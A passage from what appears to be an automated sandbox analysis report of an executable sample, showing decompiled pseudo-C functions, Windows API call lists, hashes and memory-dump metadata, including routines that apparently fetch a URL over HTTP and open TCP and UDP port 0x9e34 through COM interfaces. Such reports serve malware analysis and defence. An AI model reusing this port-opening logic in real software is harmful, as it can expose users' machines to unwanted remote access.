                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                  • String ID:
                                                                                  • API String ID: 2074799992-0
                                                                                  • Opcode ID: 934002097b16c1c95371fc30c5450db7fcfe2a36d2d131b5e556e9a6edb65e07
                                                                                  • Instruction ID: bb54af95703917af121ac1969caf4c30c918fe6ab3e07cce6cf93c7135daf7d6
                                                                                  • Opcode Fuzzy Hash: 934002097b16c1c95371fc30c5450db7fcfe2a36d2d131b5e556e9a6edb65e07
                                                                                  • Instruction Fuzzy Hash: 6D2151B15083159BC200CF55D840D5BB7E8BFCCB54F044A1EF598A3250D734EA49CBAA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 0040EB08
                                                                                  • WSAGetLastError.WS2_32(?,?,0040F024), ref: 0040EB10
                                                                                  • Sleep.KERNEL32(00000001,?,?,0040F024), ref: 0040EB26
                                                                                  • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 0040EB4C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Recv$ErrorLastSleep
                                                                                  • String ID:
                                                                                  • API String ID: 3668019968-0
                                                                                  • Opcode ID: 584b1ce09b420e9e2de366af99c2cd800ce9cb2dbd96c11a390fb674005bc2a6
                                                                                  • Instruction ID: d9337b9861168a889e2dcd888c4c975a75ea967e12d624b3d4e9d1b891e0ae49
                                                                                  • Opcode Fuzzy Hash: 584b1ce09b420e9e2de366af99c2cd800ce9cb2dbd96c11a390fb674005bc2a6
                                                                                  • Instruction Fuzzy Hash: 99117972104301AFD710DF65EC84AEBB7ECEB88710F40092AF556D2140E6B9E94997B6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E98C
                                                                                  • WSAGetLastError.WS2_32 ref: 0040E992
                                                                                  • Sleep.KERNEL32(00000001), ref: 0040E9A8
                                                                                  • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E9CA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Send$ErrorLastSleep
                                                                                  • String ID:
                                                                                  • API String ID: 2121970615-0
                                                                                  • Opcode ID: 0ba0aeec6b418c745fd099ee868048f24ecf67a0600923152052274fd2a13465
                                                                                  • Instruction ID: 07d4f8ca9de2ad22a8725cccf1b5422178c79e7604c05c206d14e21095614f42
                                                                                  • Opcode Fuzzy Hash: 0ba0aeec6b418c745fd099ee868048f24ecf67a0600923152052274fd2a13465
                                                                                  • Instruction Fuzzy Hash: D3014F712483056BE6308B96DC88FDB77A8EBC8711F00882AF608D61C0D6B5E9459B69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040E620(void* __esi) {
                                                                                  				intOrPtr _t13;
                                                                                  				intOrPtr _t19;
                                                                                  				struct _CRITICAL_SECTION* _t21;
                                                                                  				void* _t22;
                                                                                  				intOrPtr _t23;
                                                                                  				void* _t24;
                                                                                  
                                                                                  				_t22 = __esi;
                                                                                  				_t23 =  *((intOrPtr*)(_t24 + 0xc));
                                                                                  				_t21 = _t23 + 0x244;
                                                                                  				EnterCriticalSection(_t21);
                                                                                  				if(__esi == 0) {
                                                                                  					L9:
                                                                                  					LeaveCriticalSection(_t21);
                                                                                  					return 1;
                                                                                  				} else {
                                                                                  					if(InterlockedExchangeAdd(__esi + 0x14, 0) == 0) {
                                                                                  						_t13 =  *((intOrPtr*)(__esi + 0x38));
                                                                                  						_t19 =  *((intOrPtr*)(__esi + 0x34));
                                                                                  						if(_t13 != 0) {
                                                                                  							 *((intOrPtr*)(_t13 + 0x34)) = _t19;
                                                                                  						}
                                                                                  						if(_t19 == 0) {
                                                                                  							 *((intOrPtr*)(_t23 + 0x25c)) = _t13;
                                                                                  						} else {
                                                                                  							 *((intOrPtr*)(_t19 + 0x38)) = _t13;
                                                                                  						}
                                                                                  						E00408FB0( *((intOrPtr*)(_t22 + 0x2c)));
                                                                                  						E00408FB0(_t22);
                                                                                  						goto L9;
                                                                                  					} else {
                                                                                  						LeaveCriticalSection(_t21);
                                                                                  						return 0;
                                                                                  					}
                                                                                  				}
                                                                                  			}









                                                                                  0x0040e620
                                                                                  0x0040e622
                                                                                  0x0040e627
                                                                                  0x0040e630
                                                                                  0x0040e638
                                                                                  0x0040e687
                                                                                  0x0040e688
                                                                                  0x0040e693
                                                                                  0x0040e63a
                                                                                  0x0040e648
                                                                                  0x0040e659
                                                                                  0x0040e65c
                                                                                  0x0040e661
                                                                                  0x0040e663
                                                                                  0x0040e663
                                                                                  0x0040e668
                                                                                  0x0040e66f
                                                                                  0x0040e66a
                                                                                  0x0040e66a
                                                                                  0x0040e66a
                                                                                  0x0040e679
                                                                                  0x0040e67f
                                                                                  0x00000000
                                                                                  0x0040e64a
                                                                                  0x0040e64d
                                                                                  0x0040e658
                                                                                  0x0040e658
                                                                                  0x0040e648

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,0040E6EC,?,?), ref: 0040E630
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E640
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E6EC,?,?), ref: 0040E64D
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E6EC,?,?), ref: 0040E688
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                  • String ID:
                                                                                  • API String ID: 2223660684-0
                                                                                  • Opcode ID: 568366aa594a7e090c346f50c8157628f63c69297310b48d1b7581492236b14c
                                                                                  • Instruction ID: abaa9db80c897440a89c5e3e6cf5373dc13695b231f21a650e9875a219e15b50
                                                                                  • Opcode Fuzzy Hash: 568366aa594a7e090c346f50c8157628f63c69297310b48d1b7581492236b14c
                                                                                  • Instruction Fuzzy Hash: 8E01F236242304AFC3209F32FD44A9BB3A8AF95B11B40493FE846D3641DB3AE401CB28
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040C180(intOrPtr* _a4) {
                                                                                  				intOrPtr* _v8;
                                                                                  				signed int _v12;
                                                                                  				void* _t20;
                                                                                  
                                                                                  				if(_a4 != 0) {
                                                                                  					_v8 = _a4;
                                                                                  					EnterCriticalSection(_v8 + 4);
                                                                                  					_v12 = 0;
                                                                                  					while(_v12 <  *_v8) {
                                                                                  						_t11 = _v8 + 0x1c; // 0xfe5ae850
                                                                                  						CloseHandle( *( *_t11 + _v12 * 4));
                                                                                  						_v12 = _v12 + 1;
                                                                                  					}
                                                                                  					LeaveCriticalSection(_v8 + 4);
                                                                                  					DeleteCriticalSection(_v8 + 4);
                                                                                  					_t18 = _v8 + 0x1c; // 0xfe5ae850
                                                                                  					E00408FB0( *_t18);
                                                                                  					return E00408FB0(_a4);
                                                                                  				}
                                                                                  				return _t20;
                                                                                  			}






                                                                                  0x0040c18a
                                                                                  0x0040c18f
                                                                                  0x0040c199
                                                                                  0x0040c19f
                                                                                  0x0040c1b1
                                                                                  0x0040c1be
                                                                                  0x0040c1c8
                                                                                  0x0040c1ae
                                                                                  0x0040c1ae
                                                                                  0x0040c1d7
                                                                                  0x0040c1e4
                                                                                  0x0040c1ed
                                                                                  0x0040c1f1
                                                                                  0x00000000
                                                                                  0x0040c202
                                                                                  0x0040c208

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(0040F020), ref: 0040C199
                                                                                  • CloseHandle.KERNEL32(0040F024), ref: 0040C1C8
                                                                                  • LeaveCriticalSection.KERNEL32(0040F020), ref: 0040C1D7
                                                                                  • DeleteCriticalSection.KERNEL32(0040F020), ref: 0040C1E4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                  • String ID:
                                                                                  • API String ID: 3102160386-0
                                                                                  • Opcode ID: 5479a2aecdec3c162fe58c090ae0b7b4b4a14a4308e56509973f6bbdd8d0498c
                                                                                  • Instruction ID: 7eb137a9147c1387d79ab9d68254bdb898acac70a3962359ff170d5c72b28224
                                                                                  • Opcode Fuzzy Hash: 5479a2aecdec3c162fe58c090ae0b7b4b4a14a4308e56509973f6bbdd8d0498c
                                                                                  • Instruction Fuzzy Hash: F8116174900208EFDB08DFA4D984A9DB775FF84309F2081A9E8066B341DB39EE80DF85
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 62%
                                                                                  			E00405520(intOrPtr _a4) {
                                                                                  				intOrPtr _v8;
                                                                                  				void* _v12;
                                                                                  				void* _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				void* _v24;
                                                                                  				intOrPtr* _v28;
                                                                                  				void* _v32;
                                                                                  				short _v36;
                                                                                  				char _v40;
                                                                                  				intOrPtr _t95;
                                                                                  				intOrPtr _t110;
                                                                                  				void* _t118;
                                                                                  				void* _t199;
                                                                                  				void* _t200;
                                                                                  
                                                                                  				_v28 = 0;
                                                                                  				_v32 = 0;
                                                                                  				_v16 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v24 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_v20 = 0;
                                                                                  				while(1) {
                                                                                  					_t95 = E004054D0(0x411e90, 0x411ea0);
                                                                                  					_t200 = _t199 + 8;
                                                                                  					_v28 = _t95;
                                                                                  					if(_v28 == 0) {
                                                                                  						break;
                                                                                  					}
                                                                                  					_push( &_v32);
                                                                                  					_push(_v28);
                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x1c))))() == 0) {
                                                                                  						_push( &_v16);
                                                                                  						_push(_v32);
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_v32 + 0x1c))))() == 0) {
                                                                                  							_push( &_v36);
                                                                                  							_push(_v16);
                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x20))))() == 0) {
                                                                                  								if(_v36 == 0xffffffff) {
                                                                                  									_push( &_v12);
                                                                                  									_push(_v16);
                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x50))))() == 0) {
                                                                                  										_push( &_v24);
                                                                                  										_push(_a4);
                                                                                  										_push(_v12);
                                                                                  										if( *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x28))))() != 0) {
                                                                                  											_t110 = E004054D0(0x411eb0, 0x411ec0);
                                                                                  											_t199 = _t200 + 8;
                                                                                  											_v24 = _t110;
                                                                                  											if(_v24 != 0) {
                                                                                  												__imp__#2(L"Microsoft Corporation");
                                                                                  												_v8 = _t110;
                                                                                  												if(_v8 != 0) {
                                                                                  													_push(_v8);
                                                                                  													_push(_v24);
                                                                                  													if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x20))))() == 0) {
                                                                                  														_push(_a4);
                                                                                  														_push(_v24);
                                                                                  														if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x28))))() == 0) {
                                                                                  															_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                  															if(_t118 == 0) {
                                                                                  																 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x20))))(_v12, _v24);
                                                                                  																_t118 = 0;
                                                                                  																if(0 != 0) {
                                                                                  																	continue;
                                                                                  																}
                                                                                  																L34:
                                                                                  																if(_v20 != 0) {
                                                                                  																	_t118 = E00408FB0(_v20);
                                                                                  																}
                                                                                  																if(_v8 != 0) {
                                                                                  																	__imp__#6(_v8);
                                                                                  																}
                                                                                  																if(_v24 != 0) {
                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);
                                                                                  																}
                                                                                  																if(_v12 != 0) {
                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                                                  																}
                                                                                  																if(_v16 != 0) {
                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
                                                                                  																}
                                                                                  																if(_v32 != 0) {
                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v32 + 8))))(_v32);
                                                                                  																}
                                                                                  																if(_v28 == 0) {
                                                                                  																	return _t118;
                                                                                  																} else {
                                                                                  																	return  *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                  																}
                                                                                  															}
                                                                                  															goto L34;
                                                                                  														}
                                                                                  														goto L34;
                                                                                  													}
                                                                                  													goto L34;
                                                                                  												}
                                                                                  												goto L34;
                                                                                  											}
                                                                                  											goto L34;
                                                                                  										}
                                                                                  										_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x44))))(_v24,  &_v36);
                                                                                  										if(_t118 == 0) {
                                                                                  											if(_v36 != 0xffffffff) {
                                                                                  												 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x48))))(_v24, 0xffffffff);
                                                                                  												_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                  											} else {
                                                                                  												_v40 = 0;
                                                                                  												_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x34))))(_v24,  &_v40);
                                                                                  												if(_t118 == 0 && _v40 != 0) {
                                                                                  													_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                  												}
                                                                                  											}
                                                                                  										}
                                                                                  										goto L34;
                                                                                  									}
                                                                                  									goto L34;
                                                                                  								}
                                                                                  								goto L34;
                                                                                  							}
                                                                                  							goto L34;
                                                                                  						}
                                                                                  						goto L34;
                                                                                  					}
                                                                                  					goto L34;
                                                                                  				}
                                                                                  				goto L34;
                                                                                  			}

















                                                                                  0x00405526
                                                                                  0x0040552d
                                                                                  0x00405534
                                                                                  0x0040553b
                                                                                  0x00405542
                                                                                  0x00405549
                                                                                  0x00405550
                                                                                  0x00405557
                                                                                  0x00405561
                                                                                  0x00405566
                                                                                  0x00405569
                                                                                  0x00405570
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040557a
                                                                                  0x00405583
                                                                                  0x0040558b
                                                                                  0x00405595
                                                                                  0x0040559e
                                                                                  0x004055a6
                                                                                  0x004055b0
                                                                                  0x004055b9
                                                                                  0x004055c1
                                                                                  0x004055cf
                                                                                  0x004055d9
                                                                                  0x004055e2
                                                                                  0x004055ea
                                                                                  0x004055f4
                                                                                  0x004055f8
                                                                                  0x00405601
                                                                                  0x00405609
                                                                                  0x00405693
                                                                                  0x00405698
                                                                                  0x0040569b
                                                                                  0x004056a2
                                                                                  0x004056ab
                                                                                  0x004056b1
                                                                                  0x004056b8
                                                                                  0x004056bf
                                                                                  0x004056c8
                                                                                  0x004056d0
                                                                                  0x004056d7
                                                                                  0x004056e0
                                                                                  0x004056e8
                                                                                  0x004056fa
                                                                                  0x004056fe
                                                                                  0x00405712
                                                                                  0x00405714
                                                                                  0x00405716
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040571c
                                                                                  0x00405720
                                                                                  0x00405726
                                                                                  0x0040572b
                                                                                  0x00405732
                                                                                  0x00405738
                                                                                  0x00405738
                                                                                  0x00405742
                                                                                  0x00405750
                                                                                  0x00405750
                                                                                  0x00405756
                                                                                  0x00405764
                                                                                  0x00405764
                                                                                  0x0040576a
                                                                                  0x00405778
                                                                                  0x00405778
                                                                                  0x0040577e
                                                                                  0x0040578c
                                                                                  0x0040578c
                                                                                  0x00405792
                                                                                  0x004057a5
                                                                                  0x00405794
                                                                                  0x00000000
                                                                                  0x004057a0
                                                                                  0x00405792
                                                                                  0x00000000
                                                                                  0x00405700
                                                                                  0x00000000
                                                                                  0x004056ea
                                                                                  0x00000000
                                                                                  0x004056d2
                                                                                  0x00000000
                                                                                  0x004056ba
                                                                                  0x00000000
                                                                                  0x004056a4
                                                                                  0x0040561b
                                                                                  0x0040561f
                                                                                  0x0040562d
                                                                                  0x00405672
                                                                                  0x00405682
                                                                                  0x0040562f
                                                                                  0x0040562f
                                                                                  0x00405646
                                                                                  0x0040564a
                                                                                  0x00405660
                                                                                  0x00405660
                                                                                  0x00405662
                                                                                  0x00405684
                                                                                  0x00000000
                                                                                  0x0040561f
                                                                                  0x00000000
                                                                                  0x004055ec
                                                                                  0x00000000
                                                                                  0x004055d1
                                                                                  0x00000000
                                                                                  0x004055c3
                                                                                  0x00000000
                                                                                  0x004055a8
                                                                                  0x00000000
                                                                                  0x0040558d
                                                                                  0x00000000

                                                                                  APIs
                                                                                    • Part of subcall function 004054D0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004054F0
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00405738
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFreeInstanceString
                                                                                  • String ID: Microsoft Corporation
                                                                                  • API String ID: 586785272-3838278685
                                                                                  • Opcode ID: 9a625b98ebff3c221c1120575af285f8cbbbf93c67dc0beb6ef5e6c09e9c2793
                                                                                  • Instruction ID: b68b7a3bc5298b5c42a29c8e1873351d80abb6d03bdfce163c93a33f9d118317
                                                                                  • Opcode Fuzzy Hash: 9a625b98ebff3c221c1120575af285f8cbbbf93c67dc0beb6ef5e6c09e9c2793
                                                                                  • Instruction Fuzzy Hash: 0991FA75A0050ADFCB04DB98C994AAFB7B5EF88300F208169E505B73A0D739AE41DF69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 66%
                                                                                  			E0040CFE0(char* _a4) {
                                                                                  				char _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				char _v16;
                                                                                  				intOrPtr* _v20;
                                                                                  				void* _v24;
                                                                                  				void* _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				intOrPtr _v36;
                                                                                  				intOrPtr _t44;
                                                                                  				intOrPtr* _t46;
                                                                                  				intOrPtr _t59;
                                                                                  				intOrPtr _t62;
                                                                                  				void* _t88;
                                                                                  				void* _t89;
                                                                                  				void* _t90;
                                                                                  
                                                                                  				_v16 = 0;
                                                                                  				_t44 = E0040C610(_a4,  &_v8);
                                                                                  				_t89 = _t88 + 8;
                                                                                  				_v12 = _t44;
                                                                                  				if(_v12 != 0) {
                                                                                  					_t46 = E0040C3B0(_v12);
                                                                                  					_t90 = _t89 + 4;
                                                                                  					_v20 = _t46;
                                                                                  					if(_v20 != 0) {
                                                                                  						_v24 = 0;
                                                                                  						_push( &_v24);
                                                                                  						_push(_v20);
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xb4))))() == 0 && _v24 != 0) {
                                                                                  							_v28 = 0;
                                                                                  							_push( &_v28);
                                                                                  							_push(_v24);
                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x30))))() == 0 && _v28 != 0) {
                                                                                  								_t59 = E0040CF90(_v28);
                                                                                  								_t90 = _t90 + 4;
                                                                                  								_v32 = _t59;
                                                                                  								if(_v32 != 0) {
                                                                                  									_t62 = E0040CE70(_v28);
                                                                                  									_t90 = _t90 + 4;
                                                                                  									_v36 = _t62;
                                                                                  									if(_v36 != 0) {
                                                                                  										E0040B790( &_v16, "%S%S", _v32);
                                                                                  										_t90 = _t90 + 0x10;
                                                                                  										__imp__#6(_v36, _v36);
                                                                                  									}
                                                                                  									__imp__#6(_v32);
                                                                                  								}
                                                                                  								 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                  							}
                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);
                                                                                  						}
                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                  					}
                                                                                  					E00408FB0(_v12);
                                                                                  				}
                                                                                  				return _v16;
                                                                                  			}


















                                                                                  0x0040cfe6
                                                                                  0x0040cff5
                                                                                  0x0040cffa
                                                                                  0x0040cffd
                                                                                  0x0040d004
                                                                                  0x0040d00e
                                                                                  0x0040d013
                                                                                  0x0040d016
                                                                                  0x0040d01d
                                                                                  0x0040d023
                                                                                  0x0040d02d
                                                                                  0x0040d036
                                                                                  0x0040d041
                                                                                  0x0040d051
                                                                                  0x0040d05b
                                                                                  0x0040d064
                                                                                  0x0040d06c
                                                                                  0x0040d078
                                                                                  0x0040d07d
                                                                                  0x0040d080
                                                                                  0x0040d087
                                                                                  0x0040d08d
                                                                                  0x0040d092
                                                                                  0x0040d095
                                                                                  0x0040d09c
                                                                                  0x0040d0af
                                                                                  0x0040d0b4
                                                                                  0x0040d0bb
                                                                                  0x0040d0bb
                                                                                  0x0040d0c5
                                                                                  0x0040d0c5
                                                                                  0x0040d0d7
                                                                                  0x0040d0d7
                                                                                  0x0040d0e5
                                                                                  0x0040d0e5
                                                                                  0x0040d0f3
                                                                                  0x0040d0f3
                                                                                  0x0040d0f9
                                                                                  0x0040d0fe
                                                                                  0x0040d107

                                                                                  APIs
                                                                                    • Part of subcall function 0040C610: memset.NTDLL ref: 0040C638
                                                                                    • Part of subcall function 0040C610: InternetCrackUrlA.WININET(0040D429,00000000,10000000,0000003C), ref: 0040C688
                                                                                    • Part of subcall function 0040C610: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040C698
                                                                                    • Part of subcall function 0040C610: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040C6D1
                                                                                    • Part of subcall function 0040C610: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C707
                                                                                    • Part of subcall function 0040C610: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040C72F
                                                                                    • Part of subcall function 0040C610: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040C778
                                                                                    • Part of subcall function 0040C610: InternetCloseHandle.WININET(00000000), ref: 0040C807
                                                                                    • Part of subcall function 0040C3B0: SysAllocString.OLEAUT32(00000000), ref: 0040C3DE
                                                                                    • Part of subcall function 0040C3B0: CoCreateInstance.OLE32(00410328,00000000,00004401,00410318,00000000), ref: 0040C406
                                                                                    • Part of subcall function 0040C3B0: SysFreeString.OLEAUT32(00000000), ref: 0040C4A1
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040D0BB
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040D0C5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                  • String ID: %S%S
                                                                                  • API String ID: 1017111014-3267608656
                                                                                  • Opcode ID: b9efebc393b8cab70bab4711f02a4fc852ff42516b9a7e65ccb39fe286daf9b4
                                                                                  • Instruction ID: 8f39198d2c77811fae4d9ce9e1f2edbe33952e684686135c492452eaad7f6a38
                                                                                  • Opcode Fuzzy Hash: b9efebc393b8cab70bab4711f02a4fc852ff42516b9a7e65ccb39fe286daf9b4
                                                                                  • Instruction Fuzzy Hash: CC412CB5D00209DFCB04DBD4C885AEFB7B5BF88308F108569E505B7391D739AA85CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 82%
                                                                                  			E0040D3D0() {
                                                                                  				intOrPtr _v8;
                                                                                  				char _v12;
                                                                                  				signed int _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _t20;
                                                                                  				intOrPtr _t26;
                                                                                  				intOrPtr _t31;
                                                                                  				void* _t36;
                                                                                  				void* _t37;
                                                                                  
                                                                                  				__imp__CoInitializeEx(0, 2);
                                                                                  				_v12 = 0;
                                                                                  				_t20 = E0040C930( &_v12,  &_v12);
                                                                                  				_t37 = _t36 + 4;
                                                                                  				_v8 = _t20;
                                                                                  				if(_v8 != 0) {
                                                                                  					_v16 = 0;
                                                                                  					while(_v16 < _v8) {
                                                                                  						_t20 = E0040CFE0( *((intOrPtr*)(_v12 + _v16 * 4)));
                                                                                  						_t37 = _t37 + 4;
                                                                                  						 *0x414e7c = _t20;
                                                                                  						if( *0x414e7c == 0) {
                                                                                  							_v16 = _v16 + 1;
                                                                                  							continue;
                                                                                  						}
                                                                                  						_v20 = E00409880();
                                                                                  						_t31 =  *0x414e7c; // 0x0
                                                                                  						E0040D350(_t31, _t31, "TCP", 0x9e34, _v20);
                                                                                  						_t26 =  *0x414e7c; // 0x0
                                                                                  						_t20 = E0040D350(_t31, _t26, "UDP", 0x9e34, _v20);
                                                                                  						_t37 = _t37 + 0x20;
                                                                                  						break;
                                                                                  					}
                                                                                  					return E004090D0(_t20, _v8, _v12, _v8);
                                                                                  				}
                                                                                  				return _t20;
                                                                                  			}












                                                                                  0x0040d3da
                                                                                  0x0040d3e0
                                                                                  0x0040d3eb
                                                                                  0x0040d3f0
                                                                                  0x0040d3f3
